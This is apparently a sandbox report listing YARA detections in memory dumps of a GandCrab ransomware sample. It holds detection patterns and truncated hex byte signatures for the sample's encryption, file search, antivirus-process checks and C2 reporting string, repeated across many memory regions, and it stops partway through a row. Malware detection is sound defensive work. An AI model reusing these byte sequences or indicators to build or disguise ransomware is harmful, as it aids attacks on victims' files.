00000022.00000003.731764683.00000000032A0000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
00000022.00000003.731764683.00000000032A0000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
00000022.00000003.731764683.00000000032A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000022.00000003.731764683.00000000032A0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
00000022.00000003.731764683.00000000032A0000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
00000022.00000003.731764683.00000000032A0000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
00000016.00000000.548829843.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000008.00000002.421052694.000000000FE72000.00000004.00000001.01000000.00000004.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000018.00000000.570376945.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000019.00000000.588245655.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000018.00000002.585796532.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000019.00000002.608758289.000000000FE72000.00000004.00000001.01000000.00000004.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
0000000E.00000000.444554151.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000001A.00000002.628240997.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000021.00000002.703365325.000000000FE72000.00000004.00000001.01000000.00000004.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
0000000F.00000002.485778645.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000002.00000000.354396039.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000013.00000002.556440908.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000008.00000000.408927489.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000018.00000003.584737437.0000000003B60000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
00000018.00000003.584737437.0000000003B60000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
00000018.00000003.584737437.0000000003B60000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000018.00000003.584737437.0000000003B60000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
00000018.00000003.584737437.0000000003B60000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
00000018.00000003.584737437.0000000003B60000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
0000000C.00000003.444009772.0000000003730000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
0000000C.00000003.444009772.0000000003730000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
0000000C.00000003.444009772.0000000003730000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000000C.00000003.444009772.0000000003730000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
0000000C.00000003.444009772.0000000003730000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
0000000C.00000003.444009772.0000000003730000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
00000004.00000000.373713609.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000011.00000002.485870462.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000000.00000003.334936467.0000000003170000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
00000000.00000003.334936467.0000000003170000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
00000000.00000003.334936467.0000000003170000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000000.00000003.334936467.0000000003170000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
00000000.00000003.334936467.0000000003170000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
00000000.00000003.334936467.0000000003170000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
00000013.00000000.531056963.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000022.00000000.705195952.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000011.00000000.482554766.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000006.00000002.406483395.000000000FE72000.00000004.00000001.01000000.00000004.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000013.00000002.556559672.000000000FE72000.00000004.00000001.01000000.00000004.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000012.00000000.500809556.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000000F.00000000.462423463.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000021.00000000.688032587.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000001F.00000000.648211037.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000023.00000002.734163456.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000016.00000002.553896559.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000020.00000002.681984770.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000001A.00000002.628251824.000000000FE72000.00000004.00000001.01000000.00000004.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
0000000C.00000000.426845599.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000013.00000003.550407327.0000000003520000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
00000013.00000003.550407327.0000000003520000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
00000013.00000003.550407327.0000000003520000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000013.00000003.550407327.0000000003520000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
00000013.00000003.550407327.0000000003520000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
00000013.00000003.550407327.0000000003520000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
00000020.00000000.666637056.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000022.00000002.734737605.000000000FE72000.00000004.00000001.01000000.00000004.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
0000001E.00000000.626543672.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000021.00000002.703345921.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000000F.00000003.484382333.0000000003300000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
0000000F.00000003.484382333.0000000003300000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
0000000F.00000003.484382333.0000000003300000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000000F.00000003.484382333.0000000003300000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
0000000F.00000003.484382333.0000000003300000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
0000000F.00000003.484382333.0000000003300000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
0000000C.00000002.445271222.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000001E.00000002.654935793.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000000.00000000.321170731.000000000F4EA000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000001A.00000000.608029027.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000019.00000002.608744037.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000000F.00000002.485790617.000000000FE72000.00000004.00000001.01000000.00000004.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
0000000E.00000002.457737689.000000000FE72000.00000004.00000001.01000000.00000004.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
0000000E.00000003.456730321.0000000003730000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
0000000E.00000003.456730321.0000000003730000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
0000000E.00000003.456730321.0000000003730000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000000E.00000003.456730321.0000000003730000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
0000000E.00000003.456730321.0000000003730000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
0000000E.00000003.456730321.0000000003730000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
00000012.00000002.520951774.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000002.00000003.369602233.0000000003640000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
00000002.00000003.369602233.0000000003640000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
00000002.00000003.369602233.0000000003640000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000002.00000003.369602233.0000000003640000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
00000002.00000003.369602233.0000000003640000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
00000002.00000003.369602233.0000000003640000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 